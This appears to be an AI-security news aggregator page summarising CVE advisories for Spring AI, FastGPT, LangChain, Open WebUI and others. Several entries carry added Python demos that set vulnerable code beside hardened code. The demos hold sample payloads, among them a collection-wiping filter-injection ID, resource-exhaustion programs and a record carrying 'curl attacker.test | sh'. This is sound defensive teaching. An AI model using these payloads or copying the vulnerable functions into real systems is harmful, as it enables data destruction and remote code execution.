aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

6236 items

A collaborative audit scheme of IoT data integrity for fog computing

inforesearchPeer-Reviewed
security
May 9, 2026

This academic paper, published in September 2026, presents a collaborative audit scheme designed to verify that IoT (internet of things, or connected devices like sensors and smart home devices) data remains accurate and unaltered as it moves through fog computing (processing that happens on devices or local servers rather than in distant data centers). The scheme appears to address security concerns around data integrity in distributed computing environments where multiple parties need to verify information together.

Elsevier Security Journals

The value of leaked data in online social networks

inforesearchPeer-Reviewed
security

Fog-assisted data integrity auditing scheme with deduplication function for cloud storage

inforesearchPeer-Reviewed
security

120 Domain-Specific Languages for Security

inforesearchPeer-Reviewed
research

Robust Large-Scale Detection of Living-Off-the-Land Reverse Shells via Data Synthesis

inforesearchPeer-Reviewed
security

CVE-2026-41705: Spring AI's MilvusVectorStore#doDelete(List) implementation is vulnerable to filter-expression injection via unsanitized

highvulnerability
security
May 8, 2026
CVE-2026-41705

Spring AI's MilvusVectorStore#doDelete(List) method builds a Milvus filter expression from the document IDs it is asked to delete without sanitizing them, so a caller who controls an ID can inject filter syntax (filter-expression injection) and alter the filter the store executes. This affects Spring AI versions 1.0.0 through 1.0.x and 1.1.0 through 1.1.x.
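
The pattern behind this class of bug, as an added example that is not Spring AI's code: a delete-by-id helper that splices caller-supplied IDs into a Milvus-style boolean expression such as `doc_id in ["a", "b"]`, beside a hardened version that validates each ID against a strict allowlist before quoting it. The field name `doc_id`, the helper names, the ID alphabet and the malicious ID are assumptions for this demo; the expression grammar targeted (Milvus `in` / `not in` over double-quoted string literals, joined with `or`) is the documented Milvus syntax.

```python
"""Filter-expression injection through document IDs (illustrative, not Spring AI's code)."""
import re
from typing import Iterable, List

ID_FIELD = "doc_id"          # assumed metadata field holding the document id

# Assumption for the hardened path: IDs are opaque tokens (UUIDs, ULIDs,
# hashes). Anything outside this alphabet is rejected, so no quote,
# backslash, bracket or operator can ever reach the expression.
SAFE_ID = re.compile(r"^[A-Za-z0-9_.:-]{1,128}$")


class InvalidDocumentId(ValueError):
    pass


def build_filter_vulnerable(ids: Iterable[str]) -> str:
    """Naive concatenation: every ID is wrapped in quotes and trusted."""
    quoted = ", ".join(f'"{i}"' for i in ids)
    return f"{ID_FIELD} in [{quoted}]"


def build_filter_hardened(ids: Iterable[str]) -> str:
    """Validate each ID against the allowlist before it is quoted."""
    clean: List[str] = []
    for i in ids:
        if not isinstance(i, str) or not SAFE_ID.match(i):
            raise InvalidDocumentId(f"rejected document id: {i!r}")
        clean.append(i)
    if not clean:
        raise InvalidDocumentId("empty id list")
    quoted = ", ".join(f'"{i}"' for i in clean)
    return f"{ID_FIELD} in [{quoted}]"


def is_injected(expr: str) -> bool:
    """Demo-only heuristic: a legitimate delete filter has exactly one
    `in [...]` clause and no boolean connectives."""
    lowered = expr.lower()
    return expr.count(" in [") != 1 or " or " in lowered or "||" in expr


# Constructed malicious ID: closes the string literal and the list, then
# ORs in a predicate that matches every document, so the delete wipes the
# collection instead of removing one record.
MALICIOUS_ID = 'x"] or doc_id not in ["never'
```

With the vulnerable builder, `[MALICIOUS_ID]` becomes `doc_id in ["x"] or doc_id not in ["never"]`; the hardened builder raises `InvalidDocumentId` before any expression is formed. Quoting alone is not a fix here because the payload never needs to survive a quote: it supplies its own.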

Musk v. Altman week 2: OpenAI fires back, and Shivon Zilis reveals that Musk tried to poach Sam Altman

infonews
policy
May 8, 2026

This article covers week two of a lawsuit in which Elon Musk is suing OpenAI and its leaders, claiming they broke promises to keep the company a nonprofit dedicated to safe AI development. OpenAI's president Greg Brockman countered that Musk himself pushed for the company to become for-profit and wanted majority control, and that Musk is suing because he left the company in 2018 and now sees it as a competitor to xAI, his own AI company. Musk is seeking $134 billion in damages and wants to remove the current leadership and undo OpenAI's recent restructuring.

CVE-2026-44286: FastGPT is an AI Agent building platform. Prior to version 4.14.17, an unauthenticated Server-Side Request Forgery (SSRF

highvulnerability
security
May 8, 2026
CVE-2026-44286

FastGPT, a platform for building AI agents, has a vulnerability in versions before 4.14.17 that allows attackers to send requests to internal or private network addresses without needing to log in. The problem is in the fetchData function, which retrieves data from user-provided URLs but doesn't properly check them against a blocklist (isInternalAddress) that's meant to prevent SSRF attacks (where a server is tricked into making requests to systems it shouldn't access).

CVE-2026-44284: FastGPT is an AI Agent building platform. Prior to version 4.14.17, FastGPT had an inconsistent SSRF protection gap in M

mediumvulnerability
security
May 8, 2026
CVE-2026-44284

FastGPT, a platform for building AI agents, had a security flaw in how it protected against SSRF attacks (server-side request forgery, where an attacker tricks a server into connecting to unauthorized internal systems). While some endpoints blocked internal network URLs, the tool creation endpoints did not, allowing an authenticated user to save a malicious internal URL that could later be used without additional checks when running workflows.

CVE-2026-42345: FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packa

highvulnerability
security
May 8, 2026
CVE-2026-42345

FastGPT, a platform for building AI agents, has a vulnerability in versions 4.14.11 and earlier where its isInternalAddress() function fails to block cloud metadata endpoints (cloud-provider services that expose instance configuration and often credentials). Attackers can bypass the blocklist with alternative encodings of the same address, and because a related security check is disabled by default, the metadata endpoint remains reachable without additional protection.

CVE-2026-42344: FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packa

mediumvulnerability
security
May 8, 2026
CVE-2026-42344

FastGPT versions 4.14.11 and earlier have a DNS rebinding vulnerability (a TOCTOU, or Time-of-Check to Time-of-Use, flaw: the check and the action use two different results) in their isInternalAddress() function. The function resolves a hostname and confirms that the resulting IP address is not private or internal, but the actual HTTP request then performs its own separate DNS lookup, so an attacker who controls the DNS record can return a public address for the check and an internal one for the request, bypassing the protection.

CVE-2026-42343: FastGPT is an AI Agent building platform. In versions 4.14.13 and prior, the code-sandbox component suffers from insuffi

highvulnerability
security
May 8, 2026
CVE-2026-42343

FastGPT, a platform for building AI agents, has a vulnerability in versions 4.14.13 and earlier where its code-sandbox component (a container that runs submitted code in isolation) lacks enforced resource limits. Attackers can submit code that consumes excessive memory or CPU faster than the sandbox's 500 ms polling check can react, crashing the service for legitimate users (a Denial of Service). The weakness is that the sandbox relies on software-level polling instead of operating-system enforcement such as cgroups (the Linux kernel mechanism that caps a process group's resource usage).
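
What kernel enforcement buys over a polling loop, as an added example that is not FastGPT's code. cgroups need root and a cgroup v2 mount, so this stand-alone demo uses the closest per-process equivalent, POSIX rlimits applied in the child before exec: the kernel refuses the allocation, or delivers SIGXCPU, the instant the budget is exceeded, leaving no 500 ms window for a fast burst to slip through. The limit values and the three constructed child programs are assumptions for this demo. The caveat a practitioner needs: rlimits are per process (a child that forks gets fresh budgets), which is exactly why cgroups are the right tool for a real multi-process sandbox.

```python
"""OS-enforced resource limits for a sandbox child (illustrative, not FastGPT's code)."""
import resource
import subprocess
import sys

MEM_LIMIT_BYTES = 1024 * 1024 * 1024   # assumed virtual address-space budget (1 GiB)
CPU_LIMIT_SECONDS = 1                  # assumed CPU-time budget (not wall-clock)


def _apply_limits() -> None:
    """Runs in the forked child, before exec, so the limits bind the
    untrusted program from its first instruction onward."""
    resource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT_BYTES, MEM_LIMIT_BYTES))
    resource.setrlimit(resource.RLIMIT_CPU, (CPU_LIMIT_SECONDS, CPU_LIMIT_SECONDS))
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))   # no core dumps of sandbox memory


def run_sandboxed(code: str, wall_timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Execute untrusted Python `code` in a child bound by the rlimits above.
    A wall-clock timeout is still needed for children that sleep or block."""
    return subprocess.run(
        [sys.executable, "-I", "-c", code],
        preexec_fn=_apply_limits,
        capture_output=True,
        text=True,
        timeout=wall_timeout,
    )


# Constructed "attacker" programs for the demo.
MEMORY_HOG = "buf = bytearray(8 * 1024 * 1024 * 1024); print(len(buf))"   # 8 GiB > limit
CPU_HOG = "while True: pass"                                               # busy loop
BENIGN = "print(sum(range(1000)))"


def memory_hog_blocked() -> bool:
    """The 8 GiB mapping is refused by the kernel; Python raises MemoryError."""
    r = run_sandboxed(MEMORY_HOG)
    return r.returncode != 0 and "MemoryError" in r.stderr


def cpu_hog_blocked() -> bool:
    """SIGXCPU terminates the loop after 1 s of CPU; subprocess reports
    death-by-signal as a negative return code on POSIX."""
    r = run_sandboxed(CPU_HOG)
    return r.returncode < 0


def benign_runs() -> bool:
    r = run_sandboxed(BENIGN)
    return r.returncode == 0 and r.stdout.strip() == "499500"


if __name__ == "__main__":
    print("memory hog blocked:", memory_hog_blocked())
    print("cpu hog blocked:   ", cpu_hog_blocked())
    print("benign runs:       ", benign_runs())
```

Compare this with a monitor that samples the child's usage every 500 ms: a program that allocates and touches several gigabytes in a few milliseconds has already pushed the host into swap or the OOM killer before the first sample lands. The kernel-enforced budget is checked on every allocation and every scheduler tick, so there is nothing to race.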

CVE-2026-42339: New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. In versions 0.1

highvulnerability
security
May 8, 2026
CVE-2026-42339

New API, an LLM gateway and AI asset management system, has a vulnerability in versions 0.11.9-alpha.1 and earlier where its SSRF protection (safeguards against server-side request forgery, where an attacker tricks a server into making unintended web requests) fails to block the address 0.0.0.0. Any user with a valid API token can exploit this by sending requests with 0.0.0.0 as the image URL, causing the server to make requests to localhost (its own system) and potentially leak sensitive data when using certain AWS configurations.
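
The five SSRF items above (the FastGPT blocklist gap, the unvalidated saved tool URL, the metadata-endpoint and encoding bypasses, the DNS-rebinding TOCTOU, and New API's missing 0.0.0.0 rule) share one root cause: the destination is checked as a string, once, and then a different code path decides where the socket actually connects. The guard below is an added example, not code from either project. It resolves the hostname exactly once, rejects the request if any returned address is internal, and hands back the vetted IP for the HTTP client to connect to, which closes the rebinding window; running it at fetch time rather than at save time also closes the stored-URL gap. The resolver is injected so the demo runs offline; `ScriptedResolver`, `pin_url`, the metadata list and the test addresses are assumptions for this example.

```python
"""Resolve-once, pin-the-address outbound URL guard (illustrative, not FastGPT's or New API's code)."""
import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, List, Sequence
from urllib.parse import urlsplit

Resolver = Callable[[str], Sequence[str]]

# Listed explicitly so the policy is readable even though `ipaddress`
# already flags most of them: 169.254.169.254 is link-local, fd00:ec2::254
# (AWS IPv6 metadata) is inside fc00::/7.
METADATA_HOSTS = {"169.254.169.254", "fd00:ec2::254", "metadata.google.internal"}
ALLOWED_SCHEMES = {"http", "https"}


class BlockedDestination(Exception):
    pass


def is_internal_ip(addr: str) -> bool:
    """True if a server-side fetcher must never contact `addr`."""
    ip = ipaddress.ip_address(addr)
    # ::ffff:a.b.c.d carries an IPv4 address; apply the IPv4 policy to it.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (
        ip.is_private            # 10/8, 172.16/12, 192.168/16, fc00::/7, ...
        or ip.is_loopback        # 127/8, ::1
        or ip.is_link_local      # 169.254/16 (metadata lives here), fe80::/10
        or ip.is_unspecified     # 0.0.0.0 and ::, which the kernel treats as local
        or ip.is_reserved
        or ip.is_multicast
        or str(ip) in METADATA_HOSTS
    )


@dataclass(frozen=True)
class PinnedTarget:
    scheme: str
    host: str    # value for the Host header / TLS SNI
    ip: str      # the address the socket must connect to
    port: int


def pin_url(url: str, resolve: Resolver) -> PinnedTarget:
    """Parse, resolve exactly once, reject if ANY answer is internal, and
    return the vetted address. Callers connect to `ip`, never to `host`."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        raise BlockedDestination(f"unsupported or hostless URL: {url}")
    host = parts.hostname
    if host in METADATA_HOSTS:
        raise BlockedDestination(f"metadata hostname: {host}")
    try:
        answers: List[str] = [str(ipaddress.ip_address(host))]   # literal IP
    except ValueError:
        answers = list(resolve(host))                             # DNS name
    if not answers:
        raise BlockedDestination(f"no address for {host}")
    for a in answers:
        if is_internal_ip(a):
            raise BlockedDestination(f"{host} -> {a} is internal")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return PinnedTarget(parts.scheme, host, answers[0], port)


class ScriptedResolver:
    """Returns a different answer on each lookup of the same name: what DNS
    rebinding looks like from the application's side (public, then loopback)."""

    def __init__(self, script: Dict[str, List[List[str]]]):
        self.script = script
        self.calls: Dict[str, int] = {}

    def __call__(self, host: str) -> List[str]:
        n = self.calls.get(host, 0)
        self.calls[host] = n + 1
        steps = self.script.get(host, [[]])
        return steps[min(n, len(steps) - 1)]


def fetch_target_vulnerable(url: str, resolve: Resolver) -> str:
    """Check-then-re-resolve: the TOCTOU pattern the advisory describes."""
    host = urlsplit(url).hostname or ""
    if any(is_internal_ip(a) for a in resolve(host)):   # lookup #1, checked
        raise BlockedDestination(host)
    return resolve(host)[0]                              # lookup #2, unchecked


def fetch_target_hardened(url: str, resolve: Resolver) -> str:
    """Connect to the address that was actually validated."""
    return pin_url(url, resolve).ip
```

Two caveats. First, pinning means the HTTP client must be told to connect to `ip` while still sending `host` in the Host header and TLS SNI; most client libraries need a custom connection adapter for that, and a client that follows redirects must run each hop through `pin_url` again. Second, the demo omits numeric short forms such as `0x7f000001` or `2130706433`, which `ipaddress` does not parse and which therefore fall through to the resolver; in production, reject any hostname the resolver would interpret as a number.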

CVE-2026-42302: FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of

criticalvulnerability
security
May 8, 2026
CVE-2026-42302

FastGPT versions 4.14.10 through 4.14.12 have a critical vulnerability in their agent-sandbox component that allows unauthenticated Remote Code Execution (RCE, where attackers can run commands on a system they don't own). The startup script runs code-server (a web-based code editor) with authentication disabled and opens it to all network interfaces, meaning anyone who can reach the server's port 8080 can take complete control of the sandbox environment.

GHSA-pjwx-r37v-7724: LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists

highvulnerability
security
May 8, 2026
CVE-2026-44843

LangChain has a vulnerability where older code paths deserialize (convert serialized data back into objects) untrusted user input too broadly, allowing attackers to inject specially crafted LangChain objects that get instantiated with attacker-controlled arguments. The vulnerability only affects applications that accept untrusted structured input (like JSON), don't validate it first, and use affected APIs like `RunnableWithMessageHistory` or `astream_log()`.
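
The mechanism in miniature, as an added example that is not LangChain's loader: a `revive()` that turns serialized constructor records back into objects, run once with a broad allowlist ("anything in this namespace") and once with a narrow one ("only the message classes this endpoint needs"). The record shape (`{"lc": 1, "type": "constructor", "id": [...], "kwargs": {...}}`) mirrors LangChain's documented serialization format; the classes, registries, helper names and the hostile payload are invented for this demo.

```python
"""Constructor revival under a broad versus a narrow allowlist (illustrative, not LangChain's code)."""
from dataclasses import dataclass
from typing import Any, Dict, Tuple, Type


@dataclass
class HumanMessage:
    content: str


@dataclass
class AIMessage:
    content: str


@dataclass
class ShellTool:
    """Stands in for a class whose constructor has side effects (network,
    filesystem, subprocess) and must never be reachable from user JSON."""
    command: str
    instantiated: bool = True


class UnsafePayload(ValueError):
    pass


# Broad allowlist: everything under the "demo" namespace. This is the bug:
# the attacker picks the class AND its constructor arguments.
BROAD_REGISTRY: Dict[Tuple[str, ...], Type] = {
    ("demo", "schema", "HumanMessage"): HumanMessage,
    ("demo", "schema", "AIMessage"): AIMessage,
    ("demo", "tools", "ShellTool"): ShellTool,
}
# Narrow allowlist: only the two message types a chat-history endpoint needs.
MESSAGE_ONLY: Dict[Tuple[str, ...], Type] = {
    k: v for k, v in BROAD_REGISTRY.items() if k[1] == "schema"
}


def revive(obj: Any, registry: Dict[Tuple[str, ...], Type], depth: int = 0) -> Any:
    """Recursively revive constructor records whose id is in `registry`.
    Unknown ids are rejected outright rather than passed through as dicts."""
    if depth > 32:
        raise UnsafePayload("nesting too deep")
    if isinstance(obj, list):
        return [revive(x, registry, depth + 1) for x in obj]
    if not isinstance(obj, dict):
        return obj                                  # plain scalar
    if obj.get("lc") == 1 and obj.get("type") == "constructor":
        key = tuple(obj.get("id", []))
        cls = registry.get(key)
        if cls is None:
            raise UnsafePayload(f"class not allowlisted: {'.'.join(map(str, key))}")
        kwargs = obj.get("kwargs", {})
        if not isinstance(kwargs, dict):
            raise UnsafePayload("kwargs must be an object")
        revived = {k: revive(v, registry, depth + 1) for k, v in kwargs.items()}
        try:
            return cls(**revived)
        except TypeError as exc:                    # unexpected constructor args
            raise UnsafePayload(f"bad arguments for {cls.__name__}: {exc}") from exc
    return {k: revive(v, registry, depth + 1) for k, v in obj.items()}


# Constructed attacker input: a "chat history" that smuggles a tool record
# in among ordinary messages.
HOSTILE_HISTORY = [
    {"lc": 1, "type": "constructor", "id": ["demo", "schema", "HumanMessage"],
     "kwargs": {"content": "hi"}},
    {"lc": 1, "type": "constructor", "id": ["demo", "tools", "ShellTool"],
     "kwargs": {"command": "curl attacker.test | sh"}},
]
```

Under `BROAD_REGISTRY` the second record instantiates `ShellTool` with an attacker-chosen command before the application ever inspects it; under `MESSAGE_ONLY` the same payload is refused at the first non-allowlisted id. The allowlist has to be scoped to the endpoint, not to the library.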

GHSA-7rmh-48mx-2vwc: gitsign verify accepts signatures over go-git-normalized bytes, enabling trust confusion on malformed commits

mediumvulnerability
security
May 8, 2026
CVE-2026-44309

gitsign verify has a signature verification flaw where it re-encodes commit objects through go-git before checking signatures, instead of verifying the raw git object bytes. When a malformed commit has duplicate tree headers, git-core and go-git parse them differently (git-core uses the first tree, go-git uses the second), allowing an attacker to craft a signature that passes gitsign verify but refers to a completely different commit than what git-core would show to users, breaking the trust model.
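
A toy reproduction of that trust confusion, added here and not taken from gitsign or go-git: a commit object with two `tree` headers, one parser that honours the first (git-core's behaviour as the advisory describes it) and one that honours the last (go-git's), a `normalise()` that re-encodes headers through a name-keyed map so the duplicate collapses, and two verifiers, one over the normalised bytes and one over the raw bytes that the object id actually commits to. HMAC stands in for the Sigstore signature; the commit bytes, tree ids and key are constructed for this demo.

```python
"""Signatures over normalised bytes versus raw object bytes (illustrative, not gitsign's code)."""
import hashlib
import hmac
from typing import Dict, List, Tuple

TREE_A = "a" * 40   # the tree git-core shows (first header)
TREE_B = "b" * 40   # the tree a last-header parser shows

# Constructed malformed commit: two tree headers, otherwise ordinary.
RAW_COMMIT = (
    f"tree {TREE_A}\n"
    f"tree {TREE_B}\n"
    "author A U Thor <a@example.test> 1700000000 +0000\n"
    "committer A U Thor <a@example.test> 1700000000 +0000\n"
    "\n"
    "release 1.0\n"
).encode()


def git_object_id(body: bytes) -> str:
    """The real git identity: sha1 over 'commit <len>\\0' + the raw body."""
    return hashlib.sha1(b"commit %d\x00" % len(body) + body).hexdigest()


def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    head, _, _message = raw.partition(b"\n\n")
    pairs: List[Tuple[str, str]] = []
    for line in head.split(b"\n"):
        name, _, value = line.decode().partition(" ")
        pairs.append((name, value))
    return pairs


def tree_first(raw: bytes) -> str:
    return next(v for k, v in parse_headers(raw) if k == "tree")


def tree_last(raw: bytes) -> str:
    return [v for k, v in parse_headers(raw) if k == "tree"][-1]


def normalise(raw: bytes) -> bytes:
    """Re-encode via a dict keyed by header name: the last `tree` wins and
    the duplicate disappears, so the output no longer matches the object id."""
    _head, _, message = raw.partition(b"\n\n")
    fields: Dict[str, str] = {}
    for k, v in parse_headers(raw):
        fields[k] = v
    return "".join(f"{k} {v}\n" for k, v in fields.items()).encode() + b"\n" + message


KEY = b"signer-key-for-demo"   # stand-in for the signer's private key


def sign(data: bytes) -> str:
    return hmac.new(KEY, data, hashlib.sha256).hexdigest()


def verify_over_normalised(raw: bytes, sig: str) -> bool:
    """Flawed: accepts a signature made over the re-encoded form."""
    return hmac.compare_digest(sign(normalise(raw)), sig)


def verify_over_raw(raw: bytes, sig: str) -> bool:
    """Correct: the signature must cover exactly the bytes behind the object id."""
    return hmac.compare_digest(sign(raw), sig)
```

The attacker signs `normalise(RAW_COMMIT)`, whose only tree is `TREE_B`. The flawed verifier re-normalises the stored object, gets identical bytes and reports success, while `git log` on the same object shows `TREE_A`: the signature "verifies" for content the user never sees. Verifying over the raw bytes makes the same signature fail, because the bytes the object id names were never signed.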

GHSA-4vg5-rp28-gvjf: Open WebUI has Improper Authorization Control

highvulnerability
security
May 8, 2026
CVE-2026-44567

Open WebUI version 0.1.105 has an authorization flaw: users whose account status is 'pending' (the default for new sign-ups) still receive a JWT (a signed token that proves identity in web requests) and can call API endpoints meant only for approved users. The approval check is enforced only in the web interface, not in the backend API, so a pending user can bypass it by calling the API directly.
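
The fix pattern, as an added example and not Open WebUI's code: a toy HS256 token issuer plus two API guards. The vulnerable guard treats "valid token" as "authorized"; the hardened guard re-reads the account's current status and role from the user store on every request, so a pending account holding a perfectly good token is still refused by the backend regardless of what the UI hides. The signing key, user table, claim names and guard functions are constructed for this demo.

```python
"""Authorization enforced in the API layer, not only the UI (illustrative, not Open WebUI's code)."""
import base64
import hashlib
import hmac
import json
import time
from typing import Any, Dict

SECRET = b"demo-signing-key"          # assumption: server-side HS256 key
USERS: Dict[str, Dict[str, Any]] = {  # constructed user table
    "alice": {"role": "admin", "status": "active"},
    "mallory": {"role": "user", "status": "pending"},
}


class Unauthorized(Exception):
    pass


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def issue_token(username: str, ttl: int = 3600) -> str:
    """Sign-up hands out a token immediately, as the advisory describes."""
    header = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64(json.dumps({"sub": username, "exp": int(time.time()) + ttl}).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64(sig)}"


def verify_token(token: str) -> Dict[str, Any]:
    """Signature and expiry only: this establishes identity, not permission."""
    try:
        header, payload, sig = token.split(".")
        expected = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            raise Unauthorized("bad signature")
        claims = json.loads(_unb64(payload))
    except Unauthorized:
        raise
    except Exception as exc:                      # malformed structure or encoding
        raise Unauthorized("malformed token") from exc
    if claims.get("exp", 0) < time.time():
        raise Unauthorized("expired")
    return claims


def api_guard_vulnerable(token: str) -> Dict[str, Any]:
    """Only the UI checks status; any valid token reaches the handler."""
    return verify_token(token)


def api_guard_hardened(token: str, required_role: str = "user") -> Dict[str, Any]:
    """Re-read status and role from the account record on every request."""
    claims = verify_token(token)
    user = USERS.get(str(claims.get("sub", "")))
    if user is None:
        raise Unauthorized("unknown subject")
    if user["status"] != "active":
        raise Unauthorized(f"account {claims['sub']} is {user['status']}")
    if required_role == "admin" and user["role"] != "admin":
        raise Unauthorized("admin only")
    return {"sub": claims["sub"], **user}
```

Reading status from the store rather than from a token claim also means an administrator's decision to reject or suspend an account takes effect on the next request, not when the token expires.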

Using Claude Code: The Unreasonable Effectiveness of HTML

infonews
research
May 8, 2026

This article discusses using HTML instead of Markdown when requesting output from Claude, an AI assistant. HTML allows Claude to create richer explanations by including SVG diagrams, interactive widgets, and better navigation, which was less practical with older language models that had strict token limits (tokens being units of text that count toward a model's processing capacity).

GHSA-wfr5-454p-mjc2: OpenTelemetry.Exporter.Instana bypasses TLS certificate validation when a proxy is configured

mediumvulnerability
security
May 8, 2026
CVE-2026-44213

The OpenTelemetry.Exporter.Instana NuGet package (a tool for monitoring application performance) disables TLS certificate validation (the security check that verifies a server's identity) when a proxy is configured using the INSTANA_ENDPOINT_PROXY environment variable. This means an attacker who intercepts the network connection could read sensitive telemetry data and steal the Instana API key (a credential that grants access to monitoring systems). The vulnerability only affects systems where a proxy is configured and that proxy is either controlled by an attacker or vulnerable to interception.

GHSA-5c57-rqjx-35g2: Cline Kanban Server has a Cross-Origin WebSocket Hijacking Vulnerability

criticalvulnerability
security
May 8, 2026
CVE-2026-44211

The kanban npm package (used by the cline CLI tool) runs a WebSocket server on localhost that accepts connections from any website because it does not check the Origin header (the browser-supplied header identifying which web page opened the connection). A malicious page visited by the developer can therefore connect to the server, leak sensitive data such as file paths and AI chat messages, inject commands into running terminals to achieve remote code execution on the developer's machine, and kill running tasks.
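
A handshake filter for a localhost WebSocket server, as an added example that is not the kanban package's code. It parses the HTTP upgrade request, rejects any connection whose Origin is not on an explicit allowlist, and as a second factor requires a per-launch secret in the URL that only the legitimate client is given, so that a hostile page cannot connect even if it guesses the port. The allowed origins, the port and the token handling are assumptions for this demo; the upgrade request is constructed.

```python
"""Origin and token checks on a localhost WebSocket upgrade (illustrative, not the kanban package's code)."""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

ALLOWED_ORIGINS = {"vscode-webview://kanban", "http://localhost:5173"}  # assumed UI origins
SESSION_TOKEN = secrets.token_urlsafe(32)   # minted per server launch, passed to the UI out of band


def parse_handshake(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Minimal HTTP/1.1 request-line + header parser for the upgrade request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    if method != "GET":
        raise ValueError("websocket upgrade must be a GET")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers


def handshake_allowed(raw: bytes, token: str = SESSION_TOKEN) -> Tuple[bool, str]:
    """Return (accept, reason). The Origin check and the token check must both pass."""
    target, h = parse_handshake(raw)
    if h.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"
    origin = h.get("origin")
    # Browsers always send Origin on WebSocket upgrades, so a hostile page
    # cannot omit it; a missing header means a non-browser client, which
    # still has to present the session token below.
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, f"origin not allowed: {origin}"
    presented = parse_qs(urlsplit(target).query).get("token", [""])[0]
    if not hmac.compare_digest(presented.encode(), token.encode()):
        return False, "missing or wrong session token"
    return True, "ok"


def build_request(origin: Optional[str], token: str) -> bytes:
    """Constructed upgrade request in the shape a browser sends it."""
    lines = [
        f"GET /ws?token={token} HTTP/1.1",
        "Host: 127.0.0.1:3000",
        "Upgrade: websocket",
        "Connection: Upgrade",
        "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==",
        "Sec-WebSocket-Version: 13",
    ]
    if origin is not None:
        lines.append(f"Origin: {origin}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()
```

Binding to 127.0.0.1 is not a defence here: the attacker's page runs in the developer's own browser, which is already on localhost. Origin is the browser's statement of who is asking; the token covers clients that are not browsers and pages that would spoof a trusted origin through a proxy.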

The summaries, fixes, and source attributions below belong to items listed above but were extracted out of order; each is labelled with the item it describes.

The value of leaked data in online social networks (May 9, 2026): This academic paper from September 2026 examines how valuable leaked data from online social networks can be to attackers and malicious actors. The research, published in Computers & Security, analyzes the characteristics and potential uses of personal information that gets exposed when social media platforms experience breaches or data leaks. Source: Elsevier Security Journals.

Fog-assisted data integrity auditing scheme with deduplication function for cloud storage (May 9, 2026): This academic paper describes a system that combines fog computing (processing data closer to where it's generated rather than in distant cloud servers) with data integrity auditing (checking that stored files haven't been corrupted or tampered with) and deduplication (removing duplicate copies of the same data to save storage space) for cloud storage. The research proposes a scheme that performs these three functions together to improve security and efficiency when storing data in the cloud. Source: Elsevier Security Journals.

120 Domain-Specific Languages for Security (May 9, 2026): This is an academic survey article that catalogs 120 domain-specific languages (DSLs, which are specialized programming languages designed for particular problem areas) related to security. The article appears to be a comprehensive review published in a major computer science journal, covering the landscape of security-focused languages rather than describing a specific vulnerability or problem. Source: ACM Digital Library (TOPS, DTRAP, CSUR).

Robust Large-Scale Detection of Living-Off-the-Land Reverse Shells via Data Synthesis (May 9, 2026): This research paper presents a method for detecting living-off-the-land reverse shells (attacks where intruders use built-in system tools already present on a computer to open a connection back to their own machine) at large scale by using data synthesis (artificially creating training examples rather than collecting real attack data). The approach aims to improve detection systems' ability to identify these attacks, which are hard to catch because they blend in with normal system activity. Source: ACM Digital Library (TOPS, DTRAP, CSUR).

CVE-2026-41705 (Spring AI) fix: Upgrade to Spring AI 1.0.7 or greater (for 1.0.x users) or Spring AI 1.1.6 or greater (for 1.1.x users). Source: NVD/CVE Database.

Musk v. Altman week 2 source: MIT Technology Review.

CVE-2026-44286 (FastGPT) fix: Update FastGPT to version 4.14.17 or later, where this issue has been patched. Source: NVD/CVE Database.

CVE-2026-44284 (FastGPT) fix: This issue has been patched in version 4.14.17. Source: NVD/CVE Database.

CVE-2026-42345, CVE-2026-42344, CVE-2026-42343 (FastGPT) and CVE-2026-42339 (New API) source: NVD/CVE Database.

CVE-2026-42302 (FastGPT) fix: Update to FastGPT version 4.14.13 or later, as this issue has been patched in that version. Source: NVD/CVE Database.

GHSA-pjwx-r37v-7724 (LangChain) fix: LangChain will deprecate the affected APIs (`RunnableWithMessageHistory`, `astream_log()`, and `astream_events(version="v1")`) and recommend migrating to newer streaming and memory patterns like the `stream` API. Additionally, LangChain will update `load()` and `loads()` functions to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted input. Source: GitHub Advisory Database.

GHSA-7rmh-48mx-2vwc (gitsign) and GHSA-4vg5-rp28-gvjf (Open WebUI) source: GitHub Advisory Database.

Using Claude Code: The Unreasonable Effectiveness of HTML source: Simon Willison's Weblog.

